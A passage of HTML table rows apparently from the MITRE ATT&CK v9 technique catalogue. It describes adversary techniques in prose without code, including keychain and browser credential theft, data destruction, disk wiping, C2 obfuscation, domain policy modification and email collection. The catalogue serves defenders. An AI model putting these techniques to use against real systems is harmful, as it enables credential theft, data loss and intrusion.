This process loads the parameters for each launch-on-demand system-level daemon from the property list (plist) files found in <code>/System/Library/LaunchDaemons</code> and <code>/Library/LaunchDaemons</code>. These LaunchDaemons have property list files which point to the executables that will be launched. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1555"> T1555 </a> </td> <td> <a href="/versions/v9/techniques/T1555"> Credentials from Password Stores </a> </td> <td> Adversaries may search for common password storage locations to obtain user credentials. Passwords are stored in several places on a system, depending on the operating system or application holding the credentials. There are also specific applications that store passwords to make it easier for users to manage and maintain them. Once credentials are obtained, they can be used to perform lateral movement and access restricted information. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1555/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1555/001"> Keychain </a> </td> <td> Adversaries may collect the keychain storage data from a system to acquire credentials. Keychains are the built-in way for macOS to keep track of users' passwords and credentials for many services and features such as WiFi passwords, websites, secure notes, certificates, and Kerberos. Keychain files are located in <code>~/Library/Keychains/</code>, <code>/Library/Keychains/</code>, and <code>/Network/Library/Keychains/</code>. The <code>security</code> command-line utility, which is built into macOS by default, provides a useful way to manage these credentials. 
</td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1555/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1555/002"> Securityd Memory </a> </td> <td> An adversary who obtains root access (allowing them to read securityd’s memory) can scan through memory to find the correct sequence of keys in relatively few tries to decrypt the user’s logon keychain. This provides the adversary with all the plaintext passwords for users, WiFi, mail, browsers, certificates, secure notes, etc. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1555/003"> .003 </a> </td> <td> <a href="/versions/v9/techniques/T1555/003"> Credentials from Web Browsers </a> </td> <td> Adversaries may acquire credentials from web browsers by reading files specific to the target browser. Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. Web browsers typically store the credentials in an encrypted format within a credential store; however, methods exist to extract plaintext credentials from web browsers. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1555/004"> .004 </a> </td> <td> <a href="/versions/v9/techniques/T1555/004"> Windows Credential Manager </a> </td> <td> Adversaries may acquire credentials from the Windows Credential Manager. The Credential Manager stores credentials for signing into websites, applications, and/or devices that request authentication through NTLM or Kerberos in Credential Lockers (previously known as Windows Vaults). </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1555/005"> .005 </a> </td> <td> <a href="/versions/v9/techniques/T1555/005"> Password Managers </a> </td> <td> Adversaries may acquire user credentials from third-party password managers. 
Password managers are applications designed to store user credentials, normally in an encrypted database. Credentials are typically accessible after a user provides a master password that unlocks the database. After the database is unlocked, these credentials may be copied to memory. These databases can be stored as files on disk. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1485"> T1485 </a> </td> <td> <a href="/versions/v9/techniques/T1485"> Data Destruction </a> </td> <td> Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources. Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives. Common operating system file deletion commands such as <code>del</code> and <code>rm</code> often only remove pointers to files without wiping the contents of the files themselves, making the files recoverable by proper forensic methodology. This behavior is distinct from <a href="/versions/v9/techniques/T1561/001">Disk Content Wipe</a> and <a href="/versions/v9/techniques/T1561/002">Disk Structure Wipe</a> because individual files are destroyed rather than sections of a storage disk or the disk's logical structure. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1132"> T1132 </a> </td> <td> <a href="/versions/v9/techniques/T1132"> Data Encoding </a> </td> <td> Adversaries may encode data to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a standard data encoding system. Use of data encoding may adhere to existing protocol specifications and includes use of ASCII, Unicode, Base64, MIME, or other binary-to-text and character encoding systems. Some data encoding systems may also result in data compression, such as gzip. 
</td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1132/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1132/001"> Standard Encoding </a> </td> <td> Adversaries may encode data with a standard data encoding system to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a standard data encoding system that adheres to existing protocol specifications. Common data encoding schemes include ASCII, Unicode, hexadecimal, Base64, and MIME. Some data encoding systems may also result in data compression, such as gzip. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1132/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1132/002"> Non-Standard Encoding </a> </td> <td> Adversaries may encode data with a non-standard data encoding system to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a non-standard data encoding system that diverges from existing protocol specifications. Non-standard data encoding schemes may be based on or related to standard data encoding schemes, such as a modified Base64 encoding for the message body of an HTTP request. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1486"> T1486 </a> </td> <td> <a href="/versions/v9/techniques/T1486"> Data Encrypted for Impact </a> </td> <td> Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. 
This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted. In the case of ransomware, it is typical that common user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted. In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1530"> T1530 </a> </td> <td> <a href="/versions/v9/techniques/T1530"> Data from Cloud Storage Object </a> </td> <td> Adversaries may access data objects from improperly secured cloud storage. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1602"> T1602 </a> </td> <td> <a href="/versions/v9/techniques/T1602"> Data from Configuration Repository </a> </td> <td> Adversaries may collect data related to managed devices from configuration repositories. Configuration repositories are used by management systems in order to configure, manage, and control data on remote systems. Configuration repositories may also facilitate remote access and administration of devices. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1602/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1602/001"> SNMP (MIB Dump) </a> </td> <td> Adversaries may target the Management Information Base (MIB) to collect and/or mine valuable information in a network managed using Simple Network Management Protocol (SNMP). </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1602/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1602/002"> Network Device Configuration Dump </a> </td> <td> Adversaries may access network configuration files to collect sensitive data about the device and the network. 
The network configuration is a file containing parameters that determine the operation of the device. The device typically stores an in-memory copy of the configuration while operating, and a separate configuration on non-volatile storage to load after device reset. Adversaries can inspect the configuration files to reveal information about the target network and its layout, the network device and its software, or to identify legitimate accounts and credentials for later use. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1213"> T1213 </a> </td> <td> <a href="/versions/v9/techniques/T1213"> Data from Information Repositories </a> </td> <td> Adversaries may leverage information repositories to mine valuable information. Information repositories are tools that allow for storage of information, typically to facilitate collaboration or information sharing between users, and can store a wide variety of data that may aid adversaries in further objectives, or direct access to the target information. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1213/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1213/001"> Confluence </a> </td> <td> Adversaries may leverage Confluence repositories to mine valuable information. Often found in development environments alongside Atlassian JIRA, Confluence is generally used to store development-related documentation; however, it may in general contain more diverse categories of useful information, such as: </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1213/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1213/002"> Sharepoint </a> </td> <td> Adversaries may leverage the SharePoint repository as a source to mine valuable information. SharePoint will often contain useful information for an adversary to learn about the structure and functionality of the internal network and systems. 
For example, the following information may hold potential value to an adversary and may also be found on SharePoint: </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1005"> T1005 </a> </td> <td> <a href="/versions/v9/techniques/T1005"> Data from Local System </a> </td> <td> Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1039"> T1039 </a> </td> <td> <a href="/versions/v9/techniques/T1039"> Data from Network Shared Drive </a> </td> <td> Adversaries may search network shares on computers they have compromised to find files of interest. Sensitive data can be collected from remote systems via shared network drives (host shared directory, network file server, etc.) that are accessible from the current system prior to Exfiltration. Interactive command shells may be in use, and common functionality within <a href="/versions/v9/software/S0106">cmd</a> may be used to gather information. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1025"> T1025 </a> </td> <td> <a href="/versions/v9/techniques/T1025"> Data from Removable Media </a> </td> <td> Adversaries may search connected removable media on computers they have compromised to find files of interest. Sensitive data can be collected from any removable media (optical disk drive, USB memory, etc.) connected to the compromised system prior to Exfiltration. Interactive command shells may be in use, and common functionality within <a href="/versions/v9/software/S0106">cmd</a> may be used to gather information. 
</td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1565"> T1565 </a> </td> <td> <a href="/versions/v9/techniques/T1565"> Data Manipulation </a> </td> <td> Adversaries may insert, delete, or manipulate data in order to manipulate external outcomes or hide activity. By manipulating data, adversaries may attempt to affect a business process, organizational understanding, or decision making. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1565/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1565/001"> Stored Data Manipulation </a> </td> <td> Adversaries may insert, delete, or manipulate data at rest in order to manipulate external outcomes or hide activity. By manipulating stored data, adversaries may attempt to affect a business process, organizational understanding, and decision making. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1565/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1565/002"> Transmitted Data Manipulation </a> </td> <td> Adversaries may alter data en route to storage or other systems in order to manipulate external outcomes or hide activity. By manipulating transmitted data, adversaries may attempt to affect a business process, organizational understanding, and decision making. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1565/003"> .003 </a> </td> <td> <a href="/versions/v9/techniques/T1565/003"> Runtime Data Manipulation </a> </td> <td> Adversaries may modify systems in order to manipulate the data as it is accessed and displayed to an end user. By manipulating runtime data, adversaries may attempt to affect a business process, organizational understanding, and decision making. 
</td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1001"> T1001 </a> </td> <td> <a href="/versions/v9/techniques/T1001"> Data Obfuscation </a> </td> <td> Adversaries may obfuscate command and control traffic to make it more difficult to detect. Command and control (C2) communications are hidden (but not necessarily encrypted) in an attempt to make the content more difficult to discover or decipher and to make the communication less conspicuous and hide commands from being seen. This encompasses many methods, such as adding junk data to protocol traffic, using steganography, or impersonating legitimate protocols. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1001/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1001/001"> Junk Data </a> </td> <td> Adversaries may add junk data to protocols used for command and control to make detection more difficult. By adding random or meaningless data to the protocols used for command and control, adversaries can prevent trivial methods for decoding, deciphering, or otherwise analyzing the traffic. Examples may include appending/prepending data with junk characters or writing junk characters between significant characters. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1001/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1001/002"> Steganography </a> </td> <td> Adversaries may use steganographic techniques to hide command and control traffic to make detection efforts more difficult. Steganographic techniques can be used to hide data in digital messages that are transferred between systems. This hidden information can be used for command and control of compromised systems. In some cases, the passing of files embedded using steganography, such as image or document files, can be used for command and control. 
</td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1001/003"> .003 </a> </td> <td> <a href="/versions/v9/techniques/T1001/003"> Protocol Impersonation </a> </td> <td> Adversaries may impersonate legitimate protocols or web service traffic to disguise command and control activity and thwart analysis efforts. By impersonating legitimate protocols or web services, adversaries can make their command and control traffic blend in with legitimate network traffic. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1074"> T1074 </a> </td> <td> <a href="/versions/v9/techniques/T1074"> Data Staged </a> </td> <td> Adversaries may stage collected data in a central location or directory prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as <a href="/versions/v9/techniques/T1560">Archive Collected Data</a>. Interactive command shells may be used, and common functionality within <a href="/versions/v9/software/S0106">cmd</a> and bash may be used to copy data into a staging location. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1074/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1074/001"> Local Data Staging </a> </td> <td> Adversaries may stage collected data in a central location or directory on the local system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as <a href="/versions/v9/techniques/T1560">Archive Collected Data</a>. Interactive command shells may be used, and common functionality within <a href="/versions/v9/software/S0106">cmd</a> and bash may be used to copy data into a staging location. 
</td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1074/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1074/002"> Remote Data Staging </a> </td> <td> Adversaries may stage data collected from multiple systems in a central location or directory on one system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as <a href="/versions/v9/techniques/T1560">Archive Collected Data</a>. Interactive command shells may be used, and common functionality within <a href="/versions/v9/software/S0106">cmd</a> and bash may be used to copy data into a staging location. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1030"> T1030 </a> </td> <td> <a href="/versions/v9/techniques/T1030"> Data Transfer Size Limits </a> </td> <td> An adversary may exfiltrate data in fixed size chunks instead of whole files or limit packet sizes below certain thresholds. This approach may be used to avoid triggering network data transfer threshold alerts. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1491"> T1491 </a> </td> <td> <a href="/versions/v9/techniques/T1491"> Defacement </a> </td> <td> Adversaries may modify visual content available internally or externally to an enterprise network. Reasons for <a href="/versions/v9/techniques/T1491">Defacement</a> include delivering messaging, intimidation, or claiming (possibly false) credit for an intrusion. Disturbing or offensive images may be used as a part of <a href="/versions/v9/techniques/T1491">Defacement</a> in order to cause user discomfort, or to pressure compliance with accompanying messages. 
</td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1491/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1491/001"> Internal Defacement </a> </td> <td> An adversary may deface systems internal to an organization in an attempt to intimidate or mislead users. This may take the form of modifications to internal websites, or directly to user systems with the replacement of the desktop wallpaper. Disturbing or offensive images may be used as a part of <a href="/versions/v9/techniques/T1491/001">Internal Defacement</a> in order to cause user discomfort, or to pressure compliance with accompanying messages. Since internally defacing systems exposes an adversary's presence, it often takes place after other intrusion goals have been accomplished. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1491/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1491/002"> External Defacement </a> </td> <td> An adversary may deface systems external to an organization in an attempt to deliver messaging, intimidate, or otherwise mislead an organization or users. Externally-facing websites are a common victim of defacement, often targeted by adversary and hacktivist groups in order to push a political message or spread propaganda. <a href="/versions/v9/techniques/T1491/002">External Defacement</a> may be used as a catalyst to trigger events, or as a response to actions taken by an organization or government. Similarly, website defacement may also be used as setup, or a precursor, for future attacks such as <a href="/versions/v9/techniques/T1189">Drive-by Compromise</a>. 
</td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1140"> T1140 </a> </td> <td> <a href="/versions/v9/techniques/T1140"> Deobfuscate/Decode Files or Information </a> </td> <td> Adversaries may use <a href="/versions/v9/techniques/T1027">Obfuscated Files or Information</a> to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or the use of utilities present on the system. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1610"> T1610 </a> </td> <td> <a href="/versions/v9/techniques/T1610"> Deploy Container </a> </td> <td> Adversaries may deploy a container into an environment to facilitate execution or evade defenses. In some cases, adversaries may deploy a new container to execute processes associated with a particular image or deployment, such as processes that execute or download malware. In others, an adversary may deploy a new container configured without network rules, user limitations, etc. to bypass existing defenses within the environment. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1587"> T1587 </a> </td> <td> <a href="/versions/v9/techniques/T1587"> Develop Capabilities </a> </td> <td> Adversaries may build capabilities that can be used during targeting. Rather than purchasing, freely downloading, or stealing capabilities, adversaries may develop their own capabilities in-house. This is the process of identifying development requirements and building solutions such as malware, exploits, and self-signed certificates. Adversaries may develop capabilities to support their operations throughout numerous phases of the adversary lifecycle. 
</td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1587/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1587/001"> Malware </a> </td> <td> Adversaries may develop malware and malware components that can be used during targeting. Building malicious software can include the development of payloads, droppers, post-compromise tools, backdoors (including backdoored images), packers, C2 protocols, and the creation of infected removable media. Adversaries may develop malware to support their operations, creating a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1587/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1587/002"> Code Signing Certificates </a> </td> <td> Adversaries may create self-signed code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with. Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1587/003"> .003 </a> </td> <td> <a href="/versions/v9/techniques/T1587/003"> Digital Certificates </a> </td> <td> Adversaries may create self-signed SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. 
If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner. In the case of self-signing, digital certificates will lack the element of trust associated with the signature of a third-party certificate authority (CA). </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1587/004"> .004 </a> </td> <td> <a href="/versions/v9/techniques/T1587/004"> Exploits </a> </td> <td> Adversaries may develop exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than finding/modifying exploits from online or purchasing them from exploit vendors, an adversary may develop their own exploits. Adversaries may use information acquired via <a href="/versions/v9/techniques/T1588/006">Vulnerabilities</a> to focus exploit development efforts. As part of the exploit development process, adversaries may uncover exploitable vulnerabilities through methods such as fuzzing and patch analysis. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1006"> T1006 </a> </td> <td> <a href="/versions/v9/techniques/T1006"> Direct Volume Access </a> </td> <td> Adversaries may directly access a volume to bypass file access controls and file system monitoring. Windows allows programs to have direct access to logical volumes. Programs with direct access may read and write files directly from the drive by analyzing file system data structures. This technique bypasses Windows file access controls as well as file system monitoring tools. 
</td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1561"> T1561 </a> </td> <td> <a href="/versions/v9/techniques/T1561"> Disk Wipe </a> </td> <td> Adversaries may wipe or corrupt raw disk data on specific systems or in large numbers in a network to interrupt availability to system and network resources. With direct write access to a disk, adversaries may attempt to overwrite portions of disk data. Adversaries may opt to wipe arbitrary portions of disk data and/or wipe disk structures like the master boot record (MBR). A complete wipe of all disk sectors may be attempted. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1561/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1561/001"> Disk Content Wipe </a> </td> <td> Adversaries may erase the contents of storage devices on specific systems or in large numbers in a network to interrupt availability to system and network resources. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1561/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1561/002"> Disk Structure Wipe </a> </td> <td> Adversaries may corrupt or wipe the disk data structures on a hard drive necessary to boot a system, targeting specific critical systems or large numbers of systems in a network to interrupt availability to system and network resources. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1484"> T1484 </a> </td> <td> <a href="/versions/v9/techniques/T1484"> Domain Policy Modification </a> </td> <td> Adversaries may modify the configuration settings of a domain to evade defenses and/or escalate privileges in domain environments. Domains provide a centralized means of managing how computer resources (ex: computers, user accounts) can act, and interact with each other, on a network. 
The policy of the domain also includes configuration settings that may apply between domains in a multi-domain/forest environment. Modifications to domain settings may include altering domain Group Policy Objects (GPOs) or changing trust settings for domains, including federation trusts. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1484/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1484/001"> Group Policy Modification </a> </td> <td> Adversaries may modify Group Policy Objects (GPOs) to subvert the intended discretionary access controls for a domain, usually with the intention of escalating privileges on the domain. Group policy allows for centralized management of user and computer settings in Active Directory (AD). GPOs are containers for group policy settings made up of files stored within a predictable network path <code>\&lt;DOMAIN&gt;\SYSVOL\&lt;DOMAIN&gt;\Policies\</code>. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1484/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1484/002"> Domain Trust Modification </a> </td> <td> Adversaries may add new domain trusts or modify the properties of existing domain trusts to evade defenses and/or elevate privileges. Domain trust details, such as whether or not a domain is federated, allow authentication and authorization properties to apply between domains for the purpose of accessing shared resources. These trust objects may include accounts, credentials, and other authentication material applied to servers, tokens, and domains. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1482"> T1482 </a> </td> <td> <a href="/versions/v9/techniques/T1482"> Domain Trust Discovery </a> </td> <td> Adversaries may attempt to gather information on domain trust relationships that may be used to identify lateral movement opportunities in Windows multi-domain/forest environments. 
Domain trusts provide a mechanism for a domain to allow access to resources based on the authentication procedures of another domain. Domain trusts allow the users of the trusted domain to access resources in the trusting domain. The information discovered may help the adversary conduct <a href="/versions/v9/techniques/T1134/005">SID-History Injection</a>, <a href="/versions/v9/techniques/T1550/003">Pass the Ticket</a>, and <a href="/versions/v9/techniques/T1558/003">Kerberoasting</a>. Domain trusts can be enumerated using the <code>DSEnumerateDomainTrusts()</code> Win32 API call, .NET methods, and LDAP. The Windows utility <a href="/versions/v9/software/S0359">Nltest</a> is known to be used by adversaries to enumerate domain trusts. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1189"> T1189 </a> </td> <td> <a href="/versions/v9/techniques/T1189"> Drive-by Compromise </a> </td> <td> Adversaries may gain access to a system through a user visiting a website over the normal course of browsing. With this technique, the user's web browser is typically targeted for exploitation, but adversaries may also use compromised websites for non-exploitation behavior such as acquiring <a href="/versions/v9/techniques/T1550/001">Application Access Token</a>. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1568"> T1568 </a> </td> <td> <a href="/versions/v9/techniques/T1568"> Dynamic Resolution </a> </td> <td> Adversaries may dynamically establish connections to command and control infrastructure to evade common detections and remediations. This may be achieved by using malware that shares a common algorithm with the infrastructure the adversary uses to receive the malware's communications. These calculations can be used to dynamically adjust parameters such as the domain name, IP address, or port number the malware uses for command and control. 
</td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1568/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1568/001"> Fast Flux DNS </a> </td> <td> Adversaries may use Fast Flux DNS to hide a command and control channel behind an array of rapidly changing IP addresses linked to a single domain resolution. This technique uses a fully qualified domain name, with multiple IP addresses assigned to it which are swapped with high frequency, using a combination of round robin IP addressing and short Time-To-Live (TTL) for a DNS resource record. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1568/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1568/002"> Domain Generation Algorithms </a> </td> <td> Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1568/003"> .003 </a> </td> <td> <a href="/versions/v9/techniques/T1568/003"> DNS Calculation </a> </td> <td> Adversaries may perform calculations on addresses returned in DNS results to determine which port and IP address to use for command and control, rather than relying on a predetermined port number or the actual returned IP address. An IP and/or port number calculation can be used to bypass egress filtering on a C2 channel. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1114"> T1114 </a> </td> <td> <a href="/versions/v9/techniques/T1114"> Email Collection </a> </td> <td> Adversaries may target user email to collect sensitive information. 
Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1114/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1114/001"> Local Email Collection </a> </td> <td> Adversaries may target user email on local systems to collect sensitive information. Files containing email data can be acquired from a user’s local system, such as Outlook storage or cache files. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1114/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1114/002"> Remote Email Collection </a> </td> <td> Adversaries may target an Exchange server, Office 365, or Google Workspace to collect sensitive information. Adversaries may leverage a user's credentials and interact directly with the Exchange server to acquire information from within a network. Adversaries may also access externally facing Exchange services, Office 365, or Google Workspace to access email using credentials or access tokens. Tools such as <a href="/versions/v9/software/S0413">MailSniper</a> can be used to automate searches for specific keywords. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1114/003"> .003 </a> </td> <td> <a href="/versions/v9/techniques/T1114/003"> Email Forwarding Rule </a> </td> <td> Adversaries may set up email forwarding rules to collect sensitive information. Adversaries may abuse email-forwarding rules to monitor the activities of a victim, steal information, and further gain intelligence on the victim or the victim’s organization to use as part of further exploits or operations. Outlook and Outlook Web App (OWA) allow users to create inbox rules for various email functions, including forwarding to a different recipient. 
Similarly, Google Workspace users or administrators can set up mail forwarding rules via the Google Workspace web interface. Messages can be forwarded to internal or external recipients, and there are no restrictions limiting the extent of this rule. Administrators may also create forwarding rules for user accounts with the same considerations and outcomes. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1573"> T1573 </a> </td> <td> <a href="/versions/v9/techniques/T1573"> Encrypted Channel </a> </td> <td> Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1573/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1573/001"> Symmetric Cryptography </a> </td> <td> Adversaries may employ a known symmetric encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Symmetric encryption algorithms use the same key for plaintext encryption and ciphertext decryption. Common symmetric encryption algorithms include AES, DES, 3DES, Blowfish, and RC4. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1573/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1573/002"> Asymmetric Cryptography </a> </td> <td> Adversaries may employ a known asymmetric encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. 
Asymmetric cryptography, also known as public key cryptography, uses a keypair per party: one public that can be freely distributed, and one private. Due to how the keys are generated, the sender encrypts data with the receiver’s public key and the receiver decrypts the data with their private key. This ensures that only the intended recipient can read the encrypted data. Common public key encryption algorithms include RSA and ElGamal. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1499"> T1499 </a> </td> <td> <a href="/versions/v9/techniques/T1499"> Endpoint Denial of Service </a> </td> <td> Adversaries may perform Endpoint Denial of Service (DoS) attacks to degrade or block the availability of services to users. Endpoint DoS can be performed by exhausting the system resources those services are hosted on or exploiting the system to cause a persistent crash condition. Example services include websites, email services, DNS, and web-based applications. Adversaries have been observed conducting DoS attacks for political purposes and to support other malicious activities, including distraction, hacktivism, and extortion. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1499/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1499/001"> OS Exhaustion Flood </a> </td> <td> Adversaries may target the operating system (OS) for a DoS attack, since the OS is responsible for managing the finite resources on a system. These attacks do not need to exhaust the actual resources on a system since they can simply exhaust the limits that an OS self-imposes to prevent the entire system from being overwhelmed by excessive demands on its capacity. 
